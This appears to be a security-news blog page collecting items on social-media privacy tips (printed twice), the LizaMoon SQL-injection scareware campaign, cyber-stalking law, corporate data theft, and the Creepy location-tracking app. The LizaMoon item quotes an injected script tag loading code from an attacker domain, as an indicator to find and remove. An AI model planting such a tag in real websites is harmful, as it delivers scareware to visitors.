You might be sitting alone on your couch watching the game or the show, but you’re getting the camaraderie of being in a like-minded crowd. You can trash-talk with the person cheering for your opponent, or give a virtual high-five to your “friends.”
The fun part of using online social media is the networking and sharing. However, the dangerous part of using online social media can also be the networking and sharing.
Personal information is exchanged as if the conversation were happening in a private space. But the fact is that you’re really speaking in public.
Depending on the forum and privacy settings, large groups of people you don’t know — possibly even the entire world — might have access to your intimate conversations and off-hand remarks.
Online social media users need to guard private information to stay safe and secure in real life.
Here’s a list of “do’s” and “don’ts” for sharing personal information over social media websites or services.
1. Do take advantage of privacy settings — and encourage your friends to do the same.
A friend of mine had problems with a relative who was following her comments (and making comments of his own) on other friends’ pages, all because her friends — not she — had their sites open to everyone.
2. Don’t announce your vacation plans.
“Vacation photos are a great way to share your family fun with friends, but telling every one of your Facebook friends you’ll be in Bermuda for a week only invites real-life problems. Wait until you’ve returned home to share vacation information online,” said Sarah Carter of Actiance, a Belmont, Calif.-based communications security provider.
Another don’t: Don’t limit this advice to vacations. Practice it any time you plan to be out of the house.
3. Do accept friend requests with caution.
Only accept friend requests from people you know. If you aren’t sure, send a message to ask how you know each other or check them out on Google or Snopes.com to make sure the request isn’t a hoax.
4. Don’t include too much identifying information.
Everybody loves receiving birthday greetings, so go ahead and share the date. But adding the year you were born — along with your full home address, phone numbers and other personal info — gives criminals enough details about you to steal your identity.
5. Do ask questions before clicking a link.
A lot of malware shows up through random links or via status updates on social-media sites. If you aren’t sure about the link, especially if it is a shortened URL, ask the sender if it is legitimate.
6. Don’t automatically trust everyone.
When seeking out victims, criminals often take advantage of the trust levels in social media. They post scams — a popular one is to ask people to send money because the poster is stranded in London. They also disguise themselves as potential friends — “you don’t know me, but we follow the same famous movie star and have lots in common!” — among other devious acts.
[SecurityNewsDaily]
You might be sitting alone on your couch watching the game or the show, but you’re getting the camaraderie of being in a like-minded crowd. You can trash-talk with the person cheering for your opponent, or give a virtual high-five to your “friends.”
The fun part of using online social media is the networking and sharing. However, the dangerous part of using online social media can also be the networking and sharing.
Personal information is exchanged as if the conversation were happening in a private space. But the fact is that you’re really speaking in public.
Depending on the forum and privacy settings, large groups of people you don’t know — possibly even the entire world — might have access to your intimate conversations and off-hand remarks.
Online social media users need to guard private information to stay safe and secure in real life.
Here’s a list of “do’s” and “don’ts” for sharing personal information over social media websites or services.
1. Do take advantage of privacy settings — and encourage your friends to do the same.
A friend of mine had problems with a relative who was following her comments (and making comments of his own) on other friends’ pages, all because her friends — not she — had their sites open to everyone.
2. Don’t announce your vacation plans.
“Vacation photos are a great way to share your family fun with friends, but telling every one of your Facebook friends you’ll be in Bermuda for a week only invites real-life problems. Wait until you’ve returned home to share vacation information online,” said Sarah Carter of Actiance, a Belmont, Calif.-based communications security provider.
Another don’t: Don’t limit this advice to vacations. Practice it any time you plan to be out of the house.
3. Do accept friend requests with caution.
Only accept friend requests from people you know. If you aren’t sure, send a message to ask how you know each other or check them out on Google or Snopes.com to make sure the request isn’t a hoax.
4. Don’t include too much identifying information.
Everybody loves receiving birthday greetings, so go ahead and share the date. But adding the year you were born — along with your full home address, phone numbers and other personal info — gives criminals enough details about you to steal your identity.
5. Do ask questions before clicking a link.
A lot of malware shows up through random links or via status updates on social-media sites. If you aren’t sure about the link, especially if it is a shortened URL, ask the sender if it is legitimate.
6. Don’t automatically trust everyone.
When seeking out victims, criminals often take advantage of the trust levels in social media. They post scams — a popular one is to ask people to send money because the poster is stranded in London. They also disguise themselves as potential friends — “you don’t know me, but we follow the same famous movie star and have lots in common!” — among other devious acts.
[SecurityNewsDaily]
Hundreds of thousands of hacked websites spreading scareware
Using an automated SQL injection attack, criminals have embedded links to domains carrying scareware in hundreds of thousands of websites. In some cases, visitors to an infected website see an additional page that pretends to be anti-virus software and claims to have discovered an infection on the user's system. What is not clear is how often the criminals succeeded in embedding the links so that they actually work.
The scattergun approach taken by the SQL injection attack on the content databases of content management systems has meant that in many cases the links were placed in fields such as the title tag which are not interpreted when the page is displayed and are therefore never called. According to Websense, the URLs were also found in some URLs for iTunes podcasts, possibly via modifications to RSS feeds from the vendors in question. Here too the attack carries no threat, as the browser does not interpret the injected links.
The URLs include an address in the domain lizamoon.com and many security experts have therefore designated it the lizamoon attack. The domains used are no longer accessible. Security specialist Dancho Danchev has published an analysis of the domains used by this particular scareware campaign; he reports that they all ultimately lead back to a single IP address. The domains were registered just a few days ago using automatically registered Google Mail accounts.
Anyone running a web server should check their websites for injected JavaScript tags containing links such as
<script src=http://lizamoon.com/ur.php></script>. If found, these should be removed. They will also need to find the SQL injection vulnerability used to inject the nefarious content. Installing the latest version of the web application used may be sufficient, but in some cases it may be advisable to seek professional assistance from a code auditor or pen tester.[H-Online]
Move to criminalise cyber-stalking
More than 80 MPs are calling for an overhaul of stalking laws in a move that could see cyber-stalking made an offence.
The MPs, from all parties, also want police to prioritise complaints of stalking and say the crime needs to be defined in law.
Statistics released by probation union Napo, ahead of a seminar at the Houses of Parliament, show that just 2.2% of all incidences of harassment recorded by police ended in a jail sentence.
Napo said that in 2009 there were 53,000 offences of harassment recorded by police, leading to 6,581 convictions. Out of those convicted, 18.5% were jailed, the union said.
The latest figures from the British Crime Survey showed that up to five million people experienced stalking or harassment every year.
A Napo spokesman said: "It is clear therefore that a very small proportion actually reach court and even fewer receive a custodial sentence."
He added: "The sentencing guidelines need to be reviewed as a matter of urgency. Many victims report that complaints are not investigated thoroughly by the police and prosecutors."
Elfyn Llwyd, Plaid Cymru's Parliamentary Leader, is chairing the Justice Unions' Parliamentary Group seminar. Speakers will include Carol Faruqui and Tricia Bernal, who founded Protection Against Stalking after their daughters were killed. The charity's director of operations Laura Richards will also speak at the event to give guidance to MPs whose constituents are being stalked.
The Napo spokesman said stalking is a "life-changing" event in victims' lives, and added: "Stalking is not defined in law, only harassment is. The police have limited powers to enter and search premises of arrested stalkers. Cyber-stalking, which is now common, is not covered by the Protection from Harassment Act 1997."
A leaflet offering advice to MPs on the subject of stalking, both in person and over the internet, will be launched at the event.
[London Evening Standard]
Hackers target business secrets
Many net-savvy thieves are scouring corporate networks for saleable secrets
Compiled by security firm McAfee, the research found that some hackers are starting to specialise in data stolen from corporate networks.
McAfee said deals were being done for trade secrets, marketing plans, R&D reports and source code.
It urged companies to know who looks after their data as it moves into the cloud or third-party hosting centres.
"Cyber criminals are targeting this information based on what their clients are asking for," said Raj Samani, chief technology officer in Europe for McAfee.
He said some business data had always been scooped up when net thieves compromised PCs using viruses and trojans in a search for logins or credit card details.
The difference now was that there exists a ready market for the data they are finding. In some cases, said Mr Samani, thieves were running campaigns to get at particular companies or certain types of information.
The McAfee report mentioned cases in Germany, Brazil and Italy in which trade secrets were either stolen by an insider or cyber thieves tried to get hold of via a concerted attack.
In some cases, said the McAfee report, companies made the job of the criminals easier because they did little to censor useful information about a corporate's culture or structure revealed in e-mails and other messages.
Such information could prove key for thieves mounting a "social engineering" in which they pose as employees to penetrate networks.
The report detailed efforts by firms to watch casual and contract employees and the use of behavioural analysis software to spot anomalous activity on a corporate network.
Perimeter defences
Thefts of intellectual property or key documents could be hard to detect, said Mr Samani.
"You may not even know it's stolen because they just take a copy of it," he said.
Defending against these threats was getting harder, he said, because key workers with access to the most valuable information were out and about using mobile devices far from the defences surrounding a corporate HQ.
"Smartphones and laptops have crossed the perimeter," said Mr Samani.
The report comes in the wake of a series of incidents which reveal how cyber criminals are branching out from their traditional territory of spam and viruses.
2010 saw the arrival of the Stuxnet virus which targeted industrial plant equipment and 2011 has been marked by targeted attacks on petrochemical firms, the London Stock Exchange, the European Commission and many others.
Mr Samani said that, as firms start to use cloud-based services to make data easier to get at, they had to work hard to ensure they know who can see that key corporate information.
Otherwise, he warned, in the event of a breach, companies could find themselves losing the trust of customers or attracting the attention of regulators.
"You can transfer the work but you cannot transfer the liability," said Mr Samani.
[BBC]
Creepy Stalks Twitter, Foursquare, and Flickr Users by Aggregating GPS Data
Windows/Linux: If you've ever doubted how much anyone could track you based on information embedded in geolocation services like Foursquare, Twitter, and Flickr, free app Creepy will show you by aggregating GPS coordinates for any user, pointing out their most frequented hangouts on a map.Let's say you wanted to know where a specific Twitter, Foursquare, or Flickr user spends the majority of her time; Creepy lives up to its name by showing you. Just type in any username for a supported service and it will grab any and all location data it can find, from Foursquare check-ins, tweet locations, and even the EXIF data from photos posted to Flickr, Twitpic, yFrog, and other image services. Essentially, it's a stalker's dream app.
Like previously mentioned Firesheep extension for Firefox, consider this app as more as an interesting proof-of-concept (we trust you to use it for good!). Perhaps you didn't realize how accurately your tweets can pinpoint your house or favorite hangouts, or perhaps you didn't even know you were sharing location data in all your uploaded photos (easy to remove if you know how). Punch in your own accounts and see how much shows up—you might be surprised.
Creepy is a free download for Windows and Linux.
[Gizmodo]
Subscribe to:
Comments (Atom)